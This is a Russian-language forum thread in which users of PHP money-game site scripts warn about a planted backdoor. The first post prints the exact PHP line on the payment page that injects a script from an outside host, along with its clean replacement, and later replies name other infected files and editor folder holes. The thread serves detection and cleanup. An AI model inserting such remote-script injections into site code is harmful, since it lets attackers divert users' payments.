Автор Тема: Возможные проблемы в скриптах  (Прочитано 3247 раз)

0 Пользователей и 1 Гость просматривают эту тему.

shans5Автор темы

  • *
  • Оффлайн
  • Награды Более 500 созданных тем Репутация более 15 Более 2500 сообщений Более 2 лет на форуме Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен 2015
  • Расположение: Регион 58
  • Возраст: 38
  • Сообщений: 2653
  • Страна: ru
  • Поблагодарили: 205 раз(а)
  • Репутация +28/-4
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:1979-06-30
  • Рефералов 22
    • Награды
Возможные проблемы в скриптах
« : 02 Январь 2016, 12:52:15 »
Нет оценки
Сегодня в одном из скриптов
в файле  /pages/account/_payment.php обнаружил такую строку

echo "<script type=\"text/javascript\" src=\"http://wwes.ru/license.php\"></script><center><font color = 'green'><b>Выплачено!</b></font></center><BR/>";

Проверьте свои скрипты,если есть такая строка, поменяйте на
echo "<center><font color = 'green'><b>Выплачено!</b></font></center><BR />";

Далее в папке \js\editor\jscripts\tiny_mce

Посмотрите файл с названием license, если такой есть-удалите его.
Так же смотрите строки в разных файлах  ,где встречается license.php
Так же проверьте в других папках
Обменяюсь модулями(скриптами)ТУТ

Подвергнуть критике, может любой.
Создать то,что будет подвергнуто критике,дано не каждому.
 

CmsdNtk

  • *
  • Оффлайн
  • Награды Более 2 лет на форуме За время в онлайне на форуме Более 50 сообщений
  • Дата регистрации: Сен 2015
  • Сообщений: 96
  • Поблагодарили: 1 раз(а)
  • Репутация +2/-1
  • Рефералов 0
    • Награды
Возможные проблемы в скриптах
« Ответ #1 : 02 Январь 2016, 13:10:52 »
Нет оценки
Спасибо! А файл license зачем ставят злоумышленники?
a:0:{}
 

shans5Автор темы

  • *
  • Оффлайн
  • Награды Более 500 созданных тем Репутация более 15 Более 2500 сообщений Более 2 лет на форуме Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен 2015
  • Расположение: Регион 58
  • Возраст: 38
  • Сообщений: 2653
  • Страна: ru
  • Поблагодарили: 205 раз(а)
  • Репутация +28/-4
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:1979-06-30
  • Рефералов 22
    • Награды
Возможные проблемы в скриптах
« Ответ #2 : 02 Январь 2016, 14:20:07 »
Нет оценки
Точно не знаю,  в общем это одна из уловок,с момощью которых ваши деньги станут не вашими )))))))))
 

maks161

  • *
  • *
  • *
  • Оффлайн
  • Награды Более 2 лет на форуме Репутация более 5 Более 1000 сообщений Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 33
  • Сообщений: 1301
  • Страна: ru
  • Поблагодарили: 50 раз(а)
  • Репутация +12/-5
  • Пол: Мужской
  • Дата рождения:1984-03-10
  • Рефералов 0
    • Награды
Возможные проблемы в скриптах
« Ответ #3 : 09 Январь 2016, 00:29:53 »
Нет оценки
Точно не знаю,  в общем это одна из уловок,с момощью которых ваши деньги станут не вашими )))))))))
спасибо за такую информацию у меня тоже такая строка оказалась,короче деньги предлогают отправить на какие то форумы.
 

DenisKT

  • *
  • Оффлайн
  • Награды На форуме более 1 года
  • Дата регистрации: Май 2016
  • Расположение: Москва
  • Сообщений: 13
  • Страна: ru
  • Репутация +1/-0
  • Пол: Мужской
  • Рефералов 0
    • Награды
Возможные проблемы в скриптах
« Ответ #4 : 21 Июнь 2016, 11:20:40 »
Нет оценки
Я в папке js editor она вообще не нужно, там дыры, через нее деньги выводят. Она отвечает за редактор новостей, правил, контактов, об игре. А заменить очень просто на новый редактор
 

KPA3

  • *
  • Оффлайн
  • Награды На форуме более 1 года
  • Дата регистрации: Ноя 2016
  • Расположение: Ростов-на-Дону
  • Сообщений: 42
  • Страна: ru
  • Поблагодарили: 1 раз(а)
  • Репутация +0/-0
  • Пол: Мужской
  • Рефералов 0
    • Награды
Возможные проблемы в скриптах
« Ответ #5 : 25 Ноябрь 2016, 21:37:13 »
Нет оценки
этот код есть и в админском файле  /pages/admin/_story_insert.php у меня в 44 строке
 

Maklaks

  • *
  • Оффлайн
  • Награды На форуме более 1 года
  • Дата регистрации: Дек 2016
  • Сообщений: 11
  • Страна: bo
  • Репутация +0/-0
  • Пол: Мужской
  • Рефералов 0
    • Награды
Возможные проблемы в скриптах
« Ответ #6 : 09 Декабрь 2016, 22:55:40 »
Нет оценки
спс, помогло, вообще нужно шерстить все файлы на наличие непонятных скриптов, особенно, если что закодировано base64...
 

assus

  • *
  • Оффлайн
  • Награды На форуме более 1 года
  • Дата регистрации: Фев 2016
  • Сообщений: 27
  • Страна: ru
  • Репутация +0/-0
  • Пол: Мужской
  • Рефералов 0
    • Награды
Возможные проблемы в скриптах
« Ответ #7 : 27 Декабрь 2016, 22:30:56 »
Нет оценки
и не забывать фильтровать запросы
a:0:{}
 
Теги:
 

Проблемы с удвоителем

Автор Ashot777Раздел Вопросы / ответы по разным скриптам

Ответов: 0
Просмотров: 217
Последний ответ 28 Апрель 2017, 12:29:01
от Ashot777
проблемы с админкой

Автор kelyaРаздел Вопросы по настройке фф

Ответов: 6
Просмотров: 314
Последний ответ 25 Июнь 2017, 20:30:10
от Kuper
Инструкция по прописыванию модулей в скриптах

Автор kvozimirРаздел Общие вопросы по фермам

Ответов: 2
Просмотров: 395
Последний ответ 08 Июль 2017, 16:51:55
от kvozimir
Имя пользователя:
Пароль:
Session: